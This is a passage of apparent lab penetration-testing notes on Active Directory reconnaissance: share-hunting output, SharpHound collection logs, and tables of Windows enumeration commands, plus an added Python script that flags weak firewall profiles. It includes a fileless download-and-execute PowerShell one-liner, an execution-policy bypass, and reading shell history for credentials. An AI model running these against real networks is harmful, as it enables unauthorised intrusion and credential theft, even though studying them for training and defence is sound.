2022-03-31 12:17:31 -07:00 [File] {Red}<KeepExtExactRed|R|^\.key$|301B|3/31/2022 12:09:31 PM>(\\ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL\Department Shares\IT\Infosec\WaitClear.key) .key
2022-03-31 12:17:32 -07:00 [File] {Red}<KeepExtExactRed|R|^\.sqldump$|312B|3/31/2022 12:05:30 PM>(\\ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL\Department Shares\IT\Development\DenyRedo.sqldump) .sqldump
2022-03-31 12:17:32 -07:00 [File] {Red}<KeepExtExactRed|R|^\.sqldump$|310B|3/31/2022 12:05:02 PM>(\\ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL\Department Shares\IT\Development\AddPublish.sqldump) .sqldump
2022-03-31 12:17:32 -07:00 [Share] {Green}(\\ACADEMY-EA-FILE.INLANEFREIGHT.LOCAL\WsusContent)
2022-03-31 12:17:32 -07:00 [File] {Red}<KeepExtExactRed|R|^\.mdf$|297B|3/31/2022 12:09:14 PM>
BloodHound (SharpHound)
Data Collection
PS C:\> .\SharpHound.exe -c All --zipfilename ILFREIGHT
2022-04-18T13:58:22.1163680-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-04-18T13:58:22.1163680-07:00|INFORMATION|Initializing SharpHound at 1:58 PM on 4/18/2022
2022-04-18T13:58:22.6789011-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-04-18T13:58:23.0859011-07:00|INFORMATION|Beginning LDAP search for INLANEFREIGHT.LOCAL
2022-04-18T13:58:53.9130175-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 67 MB RAM
2022-04-18T13:59:15.7882911-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-04-18T13:59:16.1789011-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-04-18T13:59:23.9289011-07:00|INFORMATION|Status: 3793 objects finished (+3793 63.31667)/s -- Using 112 MB RAM
2022-04-18T13:59:45.4132861-07:00|INFORMATION|Consumer finished, closing output channel
2022-04-18T13:59:45.4601086-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-04-18T13:59:45.8663528-07:00|INFORMATION|Status: 3809 objects finished (+16 46.451)/s -- Using 110 MB RAM
2022-04-18T13:59:45.8663528-07:00|INFORMATION|Enumeration finished in 00:01:17.7919186
2022-04-18T13:59:46.3663660-07:00|INFORMATION|SharpHound Enumeration Completed at 1:59 PM on 4/18/2022! Happy Graphing!
Launch GUI
PS C:\mrci0x1> bloodhound

Living Off the Land
Basic Host Information Commands
| Command | Command Itself | Small Description |
| --- | --- | --- |
| Hostname | `hostname` | Show machine name. |
| OS Version | `[System.Environment]::OSVersion.Version` | Display OS version and revision (PowerShell). |
| Installed Patches | `wmic qfe get Caption,Description,HotFixID,InstalledOn` | List installed patches and hotfixes. |
| Network Config | `ipconfig /all` | Show full network adapter configuration. |
| Environment Variables (CMD) | `set` | List environment variables (from CMD). |
| Domain Name | `echo %USERDOMAIN%` | Show domain name (CMD). |
| Logon Server | `echo %logonserver%` | Show the domain controller used for logon (CMD). |
| System Info | `systeminfo` | Full host summary (OS, hardware, domain, patches, etc.). |
PowerShell Recon & Execution
| Command | Command Itself | Small Description |
| --- | --- | --- |
| List Modules | `Get-Module` | List available PowerShell modules. |
| Execution Policy | `Get-ExecutionPolicy -List` | Show the execution policy for each scope. |
| Bypass Execution Policy | `Set-ExecutionPolicy Bypass -Scope Process` | Temporarily bypass the execution policy for the current session. |
| Environment Variables (PowerShell) | `Get-ChildItem Env: \| Format-Table Key,Value` | List environment variables (PowerShell). |
| PowerShell History | `Get-Content $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt` | Show the user's PowerShell command history (may leak credentials/scripts). |
| Fileless Execution | `powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL'); <commands>"` | Download and execute a remote script in memory (fileless execution). |
Firewall Configuration
PS C:\mrci0x1> netsh advfirewall show allprofiles
Domain Profile Settings:
----------------------------------------------------------------------
State OFF
Firewall Policy BlockInbound,AllowOutbound
LocalFirewallRules N/A (GPO-store only)
LocalConSecRules N/A (GPO-store only)
InboundUserNotification Disable
RemoteManagement Disable
UnicastResponseToMulticast Enable
Logging:
LogAllowedConnections Disable
LogDroppedConnections Disable
FileName %systemroot%\system32\LogFiles\Firewall\pfirewall.log
MaxFileSize 4096
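The `netsh advfirewall show allprofiles` output above is a key/value listing per profile, with the Domain profile showing State OFF and both logging options disabled. The added example below (not part of the original notes) parses that layout and reports the findings a host-hardening review would raise; the sample text is constructed to match the output's layout, with two extra profiles added for contrast.

```python
"""Parse `netsh advfirewall show allprofiles` output and flag weak profiles.

Added example, not part of the original notes. NETSH_OUTPUT is constructed to
mirror the layout shown above (Domain profile) plus two invented profiles."""
import re

NETSH_OUTPUT = """\
Domain Profile Settings:
----------------------------------------------------------------------
State                                 OFF
Firewall Policy                       BlockInbound,AllowOutbound
LocalFirewallRules                    N/A (GPO-store only)
InboundUserNotification               Disable
Logging:
LogAllowedConnections                 Disable
LogDroppedConnections                 Disable
FileName                              %systemroot%\\system32\\LogFiles\\Firewall\\pfirewall.log
MaxFileSize                           4096

Private Profile Settings:
----------------------------------------------------------------------
State                                 ON
Firewall Policy                       BlockInbound,AllowOutbound
Logging:
LogAllowedConnections                 Disable
LogDroppedConnections                 Enable
MaxFileSize                           4096

Public Profile Settings:
----------------------------------------------------------------------
State                                 ON
Firewall Policy                       BlockInboundAlways,AllowOutbound
Logging:
LogDroppedConnections                 Enable
MaxFileSize                           4096
"""

PROFILE_RE = re.compile(r"^(\w+) Profile Settings:\s*$")
# Setting names may contain single spaces ("Firewall Policy"); the value is
# separated from the name by two or more spaces, as netsh prints it.
SETTING_RE = re.compile(r"^(\S+(?: \S+)*)\s{2,}(.+?)\s*$")


def parse_profiles(text):
    """Return {profile: {setting: value}}; 'Logging:' and rule lines are flattened."""
    profiles, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = PROFILE_RE.match(line)
        if m:
            current = profiles.setdefault(m.group(1), {})
            continue
        if current is None or not line or line.startswith("---") or line.endswith(":"):
            continue
        m = SETTING_RE.match(line)
        if m:
            current[m.group(1)] = m.group(2)
    return profiles


def firewall_findings(text):
    """List (profile, issue) pairs a host-hardening review would raise."""
    findings = []
    for name, cfg in parse_profiles(text).items():
        if cfg.get("State", "").upper() != "ON":
            findings.append((name, "firewall state is not ON"))
        if cfg.get("LogDroppedConnections", "Disable").lower() != "enable":
            findings.append((name, "dropped connections are not logged"))
        if not cfg.get("Firewall Policy", "").startswith("BlockInbound"):
            findings.append((name, "inbound default is not block"))
    return findings


if __name__ == "__main__":
    for profile, issue in firewall_findings(NETSH_OUTPUT):
        print(f"{profile}: {issue}")
```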
Windows Defender Status
C:\mrci0x1> sc query windefend
SERVICE_NAME: windefend
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PS C:\mrci0x1> Get-MpComputerStatus
AMEngineVersion : 1.1.19000.8
AMProductVersion : 4.18.2202.4
AMRunningMode : Normal
AMServiceEnabled : True
AMServiceVersion : 4.18.2202.4
AntispywareEnabled : True
AntispywareSignatureAge : 0
AntispywareSignatureLastUpdated : 3/21/2022 4:06:15 AM
AntispywareSignatureVersion : 1.361.414.0
AntivirusEnabled : True
AntivirusSignatureAge : 0
AntivirusSignatureLastUpdated : 3/21/2022 4:06:16 AM
AntivirusSignatureVersion : 1.361.414.0
BehaviorMonitorEnabled : True
ComputerID : FDA97E38-1666-4534-98D4-943A9A871482
ComputerState : 0
DefenderSignaturesOutOfDate : False
DeviceControlDefaultEnforcement : Unknown
DeviceControlPoliciesLastUpdated : 3/20/2022 9:08:34 PM
DeviceControlState : Disable
FullScanStartTime :
IoavProtectionEnabled : True
IsTamperProtected : True
IsVirtualMachine : False
LastFullScanSource : 0
LastQuickScanSource : 2
Checking Logged-in Users
PS C:\mrci0x1> qwinsta
SESSIONNAME USERNAME ID STATE TYPE DEVICE
services 0 Disc
>console forend 1 Active
rdp-tcp 65536 Listen
Network Enumeration
| Command | Command Itself | Small Description |
| --- | --- | --- |
| ARP Table | `arp -a` | List devices seen in the ARP cache (local LAN devices). |
| Network Config | `ipconfig /all` | Show full network adapter settings (IP, DNS, gateway). |
| Routing Table | `route print` | Show network routes (which networks are reachable). |
| Firewall Info | `netsh advfirewall show allprofiles` | Display firewall status and active firewall rules. |
WMIC System Enumeration
| Command | Command Itself | Small Description |
| --- | --- | --- |
| Installed Patches | `wmic qfe get Caption,Description,HotFixID,InstalledOn` | Show installed Windows updates/patches. |
| System Info | `wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List` | Display host name, domain, manufacturer, model and user info. |
| Running Processes | `wmic process list /format:list` | List all running processes. |
| Domain Info | `wmic ntdomain list /format:list` | Show domain controller and domain name info. |
| User Accounts | `wmic useraccount list /format:list` | List local and domain users who have logged in. |
| Groups | `wmic group list /format:list` | List local groups on the system. |
| Service Accounts | `wmic sysaccount list /format:list` | List system/service accounts used by services. |
Domain Enumeration (net Commands)
| Command | Command Itself | Small Description |
| --- | --- | --- |
| Local Password Policy | `net accounts` | Show local password and lockout policy. |
| Domain Password Policy | `net accounts /domain` | Show domain-wide password and lockout policy. |
| Domain Groups | `net group /domain` | List all domain groups. |
| Domain Admin Members | `net group "Domain Admins" /domain` | Show users in the Domain Admins group. |
| User Info (Specific) | `net user <ACCOUNT_NAME> /domain` | Show info for a specific domain user. |
| All Domain Users | `net user /domain` | List all users in the domain. |
| Domain Machines | `net view /domain` | List all machines joined to the domain. |